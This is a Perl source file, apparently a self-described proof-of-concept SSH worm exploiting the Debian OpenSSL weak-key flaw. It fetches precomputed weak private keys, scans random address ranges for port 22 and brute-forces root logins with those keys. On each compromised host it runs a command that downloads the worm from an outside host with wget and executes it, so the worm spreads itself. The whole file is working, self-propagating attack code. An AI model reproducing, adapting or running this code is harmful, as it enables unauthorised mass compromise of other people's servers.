#!/usr/bin/perl # # Just a lil worm code using perl, this code may run so slowly # which may make you so much bored hahaha. # # Simple PoC of ssh worm on debian based linux uses libssl flaw. # This code is provided by Dj AO of kandangjamur.net to kill his boring time # # LIST=$(cat rsa.test);for FILE in $LIST;do echo Using private key $(pwd)/rsa/2048/$FILE;ssh -lzeus -i $(pwd)/rsa/2048/$FILE -o PasswordAuthentication=no 10.13.8.90 "pwd" > /dev/null 2>&1;if [ $? -eq 0 ];then echo $(tput setaf 1)Private key found : $(pwd)/rsa/2048/$FILE$(tput sgr0);echo Private key found : $(pwd)/rsa/2048/$FILE >> vulner.log;break;fi;done use POSIX; use Switch; use IO::Socket; $MAXCHILD=100; $MAXCON=25; $|=1; $URLBASE="http://31337.leet/ssh-w0rm.pl"; $DIRBASE="/usr/local/share/rsa"; #$EXEC="mkdir $DIRBASE;cd $DIRBASE;wget $URLBASE -O $DIRBASE/ssh-w0rm.pl >/dev/null 2>&1;perl $DIRBASE/ssh-worm.pl"; #Download Requirements open(WGET,"< /usr/bin/wget") or die("Cannot open wget for download\n"); #Download DSA/RSA file #uncomment this line to compromise DSA 1024 based authentication #$wgetprivkey1="wget -bct0 http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2"; #system($wgetprivkey1); #uncomment this line to compromise RSA 2048 based authentication $wgetprivkey2="wget -bct0 http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 -O $DIRBASE/rsa2048.tar.bz2"; system($wgetprivkey2); #Extract DSA/RSA private key file #Uncomment for DSA 1024 #system("cd $DIRBASE;tar jxvf debian_ssh_dsa_1024_x86.tar.bz2"); #Uncomment for RSA 2048 system("cd $DIRBASE;tar jxvf rsa2048.tar.bz2"); #Create RSA listing file #Uncomment for DSA 1024 #system("ls $DIRBASE/dsa/1024/|grep -v pub > $DIRBASE/privkeydsa.txt"); #Uncomment for RSA 2048 system("ls $DIRBASE/rsa/2048/|grep -v pub > $DIRBASE/privkeyrsa.txt"); LOOP: unlink("hostlist.txt"); bikinhost(); open(HOST,"< hostlist.txt") or die(); unlink("sshhost.txt"); #Scanning and brute forcing with forking. #You can use threading to minimize resource chop(@ipAddrT=); $count=0; for($i=0;$i<=$#ipAddrT;$i++) { $count++; switch(fork()){ case 0 { scanssh($ipAddrT[$i]); _exit(0); break; } case -1 { print "Fork is failed\n"; _exit(1); break; } else{ if($count> $MAXCHILD-2) { wait(); $count--; } break; } } } open(SSHHOST, "< sshhost.txt") or die(); chop(@sshAddr = ); for($j=0;$j<=$#sshAddr;$j++) { #Use DSA 1024 #open(RSAKEY,"< privkeydsa.txt"); #Use RSA 2048 open(RSAKEY, "< privkeyrsa.txt"); chop(@FileKey = ); $cnt=0; for($x=0;$x<=$#FileKey;$x++) { $cnt++; switch(fork()){ case 0 { brutekey($sshAddr[$j],$FileKey[$x]); _exit(0); break; } case -1 { print "fork is failed\n"; _exit(1); break; } else{ if($cnt>$MAXCON) { wait(); $cnt--; } break; } } } close(RSAKEY); } #silakan di uncomment sleep 1200; goto LOOP; #Some function here sub bikinhost() { unlink("hostlist.txt"); $numrange=255; $blokA=int(rand($numrange)); $blokB=int(rand($numrange)); $blokC=int(rand($numrange)); open(NEWHOST,"> hostlist.txt"); for($countC=1;$countC<255;$countC++){ $host=$blokA.".".$blokB.".".$blokC.".".$countC; print NEWHOST $host."\n"; } close(NEWHOST); } sub scanssh() { my($host)=@_; open(SSHHOST, ">>sshhost.txt"); print "Scanning $host\n"; $s = new IO::Socket::INET(Proto => "tcp", PeerAddr => $host, PeerPort=> 22, Timeout=> 8); if($s) { print SSHHOST $host."\n"; } close(SSHHOST); } sub brutekey() { my($sshhost,$privkey)=@_; print "Brute $sshhost using Private Key $privkey\n"; #Even if i've disabled password authentication, but when the target server is pam enabled (UsePAM yes) #this code can't continue massive scanning bcoz password prompt (Or still continue when target server #with pam enabled closes connection??). $CMD="ssh -lroot -o PasswordAuthentication=no -o StrictHostKeyChecking=no -i rsa/2048/$privkey $sshhost \"if [ ! -d $DIRBASE ];then mkdir $DIRBASE;cd $DIRBASE;wget $URLBASE -O $DIRBASE/ssh-w0rm.pl >/dev/null 2>&1;perl $DIRBASE/ssh-worm.pl;fi\" > /dev/null 2>&1"; system($CMD); #Try to add report when a machine compromised kids! #I don't want this code used by kiddie who can't analyse this lame code #Hint : Use $? variable okay?! }